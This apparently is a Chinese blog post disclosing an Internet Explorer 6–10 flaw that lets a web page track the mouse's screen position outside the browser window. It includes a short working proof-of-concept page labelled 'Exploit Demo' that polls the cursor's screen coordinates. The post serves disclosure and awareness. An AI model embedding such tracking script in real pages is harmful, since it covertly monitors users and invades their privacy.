IE6-10浏览器鼠标坐标跟踪安全风险
2017-11-09 15:27
246 查看
最近在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置,即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。
影响版本:IE6-10
![](https://img-blog.csdn.net/20171109152647400?watermark/2/text/aHR0cDovL2Jsb2cuY3Nkbi5uZXQvdTAxMzI0NzU3NA==/font/5a6L5L2T/fontsize/400/fill/I0JBQkFCMA==/dissolve/70/gravity/SouthEast)
Code:
影响版本:IE6-10
Code:
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>Exploit Demo</title> <script type="text/javascript"> window.attachEvent("onload", function() { var detector = document.getElementById("detector"); detector.attachEvent("onmousemove", function (e) { detector.innerHTML = e.screenX + ", " + e.screenY; }); setInterval(function () { detector.fireEvent("onmousemove"); }, 100); }); </script> </head> <body> <div id="detector"></div> </body> </html>
相关文章推荐
- IE浏览器鼠标坐标跟踪安全风险,通杀全版本
- IE浏览器鼠标坐标跟踪安全风险,通杀全版本---IE的最大特色
- 跟踪鼠标在窗口上的坐标
- 关于IE6浏览器出现“你的安全设置不允许网站使用Active控件”
- JS+JQuery实现任意意嵌套的IFrame里鼠标相对于浏览器窗体坐标
- js 给div 添加选区,类似windows桌面选区一样,兼容ie6、7、8、9、10、Firefox、Google、所有浏览器
- IE下的一个安全BUG —— 可实时跟踪系统鼠标位置
- 取得浏览器当前鼠标的X,Y坐标的JavaScript脚本及document元素的一些重要属性
- MFC中用OpenCV显示图像,并跟踪鼠标显示图像的坐标与像素
- 实时显示鼠标指针相对于浏览器X轴Y轴坐标位置
- 用 javascript 获取鼠标(光标)的坐标位置 兼容IE/Firefox等浏览器
- 获取鼠标的坐标值(保证跨浏览器兼容)
- 关于在IE下的一个安全BUG --可用于跟踪用户的系统鼠标位置
- 浏览器的鼠标坐标值获取及pageX、clientX、screenX的差异
- selenium上滑动鼠标,浏览器接口不清零坐标参数
- js获取鼠标坐标位置兼容多个浏览器
- AutoLISP实时跟踪鼠标坐标
- IE下的一个安全BUG —— 可跟踪用户的系统鼠标位置
- js原生代码编写一个鼠标在页面移动坐标的检测功能,兼容各大浏览器